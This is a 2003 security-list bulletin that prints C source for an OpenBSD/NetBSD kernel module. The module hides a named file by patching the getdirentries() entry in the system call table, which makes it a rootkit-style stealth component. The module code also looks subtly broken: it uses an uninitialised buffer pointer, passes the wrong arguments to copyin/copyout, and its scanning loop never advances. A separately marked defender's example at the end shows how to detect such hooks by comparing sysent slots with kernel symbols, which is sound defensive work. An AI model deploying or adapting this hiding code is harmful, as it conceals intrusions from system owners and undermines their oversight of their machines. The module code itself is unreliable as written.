[EXPL] OpenBSD and NetBSD LKM That Hides Files by Patching getdirentries()
From: support@securiteam.com
Date: 01/05/03
From: support@securiteam.com To: list@securiteam.com Date: 6 Jan 2003 00:41:31 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
OpenBSD and NetBSD LKM That Hides Files by Patching getdirentries()
------------------------------------------------------------------------
SUMMARY
The following exploit code is an LKM (Loadable Kernel Module) that hides files by patching the getdirentries() system call (<http://resin.csoft.net/cgi-bin/man.cgi?section=2&topic=getdirentriesen>): it overwrites the getdirentries entry in the kernel's system call table with its own handler, which calls the real implementation and then removes any directory entry whose name matches a hard-coded string from the buffer returned to user space.
DETAILS
Exploit:
/* OpenBSD (should work also on NetBSD) LKM hiding file using
   getdirentries systemcall! */
/* 2002 by gr33k gr33k@frapes.org www.frapes.org www.gm.fh-koeln.de/~ai604 */
#define DONT_PERMIT
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/mount.h>
#include <sys/conf.h>
#include <sys/syscallargs.h>
#include <sys/exec.h>
#include <sys/lkm.h>
#include <sys/file.h>
#include <sys/filedesc.h>
#include <sys/errno.h>
#include <sys/dirent.h>
#include <sys/proc.h>
#include <sys/syslog.h>
#include <sys/malloc.h>

int my_getdirentries __P((struct proc *, void *, register_t *));

MOD_MISC("HideFile");

/* Load handler: overwrite the getdirentries slot of the system call table
   (sysent[]) with the module's own function. */
static int
HideFile_load(struct lkm_table *lkmtp, int cmd)
{
    if (cmd == LKM_E_LOAD)
    {
        sysent[SYS_getdirentries].sy_call = my_getdirentries;
    }
    return 0;
}

/* Unload handler: put the kernel's original sys_getdirentries() back. */
static int
HideFile_unload(struct lkm_table *lkmtp, int cmd)
{
    if (cmd == LKM_E_UNLOAD)
    {
        sysent[SYS_getdirentries].sy_call = sys_getdirentries;
    }
    return 0;
}

/* Module entry point (K&R-style definition) invoked by modload(8). */
HideFile(lkmtp, cmd, ver)
struct lkm_table *lkmtp;
int cmd;
int ver;
{
    DISPATCH(lkmtp, cmd, ver, HideFile_load, HideFile_unload, lkm_nofunc);
}

/* Replacement system call: runs the real getdirentries(), copies the
   returned dirent records in from user space, splices out every record
   whose d_name equals the string in hide[], shrinks the byte count and
   copies the edited buffer back out. */
int
my_getdirentries(p, v, retval)
struct proc *p;
void *v;
register_t *retval;
{
    register struct sys_getdirentries_args *uap = v;
    unsigned int tmp, n, t;
    struct dirent *dirp2, *dirp3;
    char hide[] = "top-secret"; /* Edit filename */

    getdirentries(p, uap);
    tmp = p->p_dupfd;                    /* number of bytes returned */
    if (tmp > 0)
    {
        copyin(&(uap->buf), dirp2, tmp); /* fetch the user's dirent buffer */
        dirp3 = dirp2;
        t = tmp;
        while (t > 0)
        {
            n = dirp3->d_reclen;         /* length of the current record */
            t -= n;
            if (strcmp((char *)&(dirp3->d_name), (char *)&hide) == 0)
            {
                /* shift the remaining records down over the matching one */
                if (t != 0)
                    bcopy((char *)dirp3 + n, (char *)dirp3, t);
            }
            tmp -= n;
        }
        if (dirp3->d_reclen == 0)
            t = 0;
        if (t != 0)
            dirp3 = (struct dirent *)((char *)dirp3 + dirp3->d_reclen);
    }
    p->p_dupfd = tmp;                    /* report the reduced byte count */
    copyout(dirp2, &(uap->buf), tmp);    /* write the edited buffer back */
    return (0);
}
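Added defender's example, not part of the advisory or gr33k's code: the module works by overwriting sysent[SYS_getdirentries].sy_call, so the matching integrity check compares every sysent slot against the kernel symbol table and flags a handler that is not the sys_<name> symbol or that lies outside the static kernel text. Reading the live table (kvm_read(3) on the sysent symbol, kvm_nlist(3) for the addresses) is assumed and not shown; sample_syms, sample_sysent, the text bounds and all addresses are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A kernel symbol as kvm_nlist(3) reports it; the array is kept sorted by address. */
struct ksym { const char *name; uintptr_t addr; };
/* One slot of sysent[]: the syscall name and the sy_call pointer read out of the kernel. */
struct sysent_slot { const char *name; uintptr_t sy_call; };
enum hook_state { HOOK_NONE = 0, HOOK_OUTSIDE_TEXT, HOOK_WRONG_SYMBOL };

/* Nearest symbol at or below addr, i.e. the function that contains it. */
static const struct ksym *resolve(const struct ksym *syms, size_t n, uintptr_t addr)
{
    const struct ksym *best = NULL;
    for (size_t i = 0; i < n && syms[i].addr <= addr; i++)
        best = &syms[i];
    return best;
}
/* The handler for syscall X must be exactly the symbol sys_X and must lie inside
 * the static kernel text [text_start, etext); code loaded as an LKM never does. */
enum hook_state classify_slot(const struct sysent_slot *slot, const struct ksym *syms,
                              size_t nsyms, uintptr_t text_start, uintptr_t etext)
{
    char expected[64];
    if (slot->sy_call < text_start || slot->sy_call >= etext)
        return HOOK_OUTSIDE_TEXT;
    snprintf(expected, sizeof expected, "sys_%s", slot->name);
    const struct ksym *s = resolve(syms, nsyms, slot->sy_call);
    if (s == NULL || s->addr != slot->sy_call || strcmp(s->name, expected) != 0)
        return HOOK_WRONG_SYMBOL;
    return HOOK_NONE;
}
/* Print every slot that does not point at its own handler; returns how many there were. */
size_t report_hooks(const struct sysent_slot *tab, size_t n, const struct ksym *syms,
                    size_t nsyms, uintptr_t text_start, uintptr_t etext)
{
    size_t hooked = 0;
    for (size_t i = 0; i < n; i++) {
        enum hook_state st = classify_slot(&tab[i], syms, nsyms, text_start, etext);
        if (st == HOOK_NONE) continue;
        printf("sysent[%s] -> %#lx: %s\n", tab[i].name, (unsigned long)tab[i].sy_call,
               st == HOOK_OUTSIDE_TEXT ? "outside kernel text" : "not the sys_ symbol");
        hooked++;
    }
    return hooked;
}

/* Constructed sample (invented addresses): text is [0x1000, 0x4000); getdirentries points above etext like an LKM. */
const struct ksym sample_syms[] = { { "sys_read", 0x1000 }, { "sys_getdirentries", 0x2000 },
                                    { "sys_write", 0x3000 }, { "etext", 0x4000 } };
const struct sysent_slot sample_sysent[] = { { "read", 0x1000 }, { "getdirentries", 0x9000 }, { "write", 0x3000 } };
int main(void) { return report_hooks(sample_sysent, 3, sample_syms, 4, 0x1000, 0x4000) ? 1 : 0; }
```

On a real system the same comparison run from a known-good kernel symbol table also catches a hook that points inside kernel text but at the wrong function, which the text-bounds check alone would miss.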
ADDITIONAL INFORMATION
The information has been provided by <mailto:gr33k@frapes.org> gr33k.
This bulletin is sent to members of the SecuriTeam mailing list.